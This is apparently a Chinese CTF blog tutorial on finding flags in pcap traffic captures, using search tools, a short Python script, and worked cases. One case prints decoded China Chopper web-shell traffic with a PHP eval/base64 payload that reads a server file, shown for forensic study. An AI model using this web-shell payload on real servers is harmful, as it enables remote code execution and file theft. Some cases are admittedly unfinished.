CTF之流量分析

CTF杂项中存在一种题型——流量分析,主要是给你一个流量包,让你分析获取其中的flag的值。

有5种方式,可以直接查找flag。

1、直接搜索

CTF之流量分析_第1张图片

2、使用notepad++等软件,直接打开流量包,搜索关键字

CTF之流量分析_第2张图片

3、编写python脚本

#encoding:utf-8
#用二进制方式读取文件
file=open("networking.pcap","rb")
#读取文件内容
i=file.read()
#查找字段
a1=i.find("flag{")
a2=i.find("}",a1)
#将查找的字段,组合起来
a3=i[a1:a2+1]
print a3

4、windows cmd命令

type networking.pcap | findstr "flag"

5、linux string 命令

strings networking.pcap | grep flag

实战

案例一:

CTF之流量分析_第3张图片

CTF之流量分析_第4张图片

案例二:

使用wireshare打开pcap包,显示tcp流

CTF之流量分析_第5张图片

好像已经找到了密码,但是有点不对劲,hex dump一下看看。

CTF之流量分析_第6张图片

7f对应的ascII码是DEL,是删除,0D代表的是回车。

因此flag是backdoor00Rm8ate

案例三:简单文件提取

wireshark读取pcap包,追踪TCP流,

CTF之流量分析_第7张图片

将post请求,进行url及base64解码,发现好像是菜刀客户端流量,使用菜刀客户端下载了x.tar.gz文件。

ISG2014=
@eval(base64_decode($_POST[z0]));
&z0=@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];
$fp=@fopen($F,"r");
if(@fgetc($fp)){@fclose($fp);@readfile($F);
}
else
{
echo("ERROR:// Can Not Read");
};
echo("|<-");
die();
&z1=/var/www/html/x.tar.gz

因此,接下来,我们需要从数据包提取该文件,使用winhex来提取。

没有复现成功,每天研究:

类似题型:

https://www.pianshen.com/article/42121685884/

案例四:

未完待续。。。

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(ctf)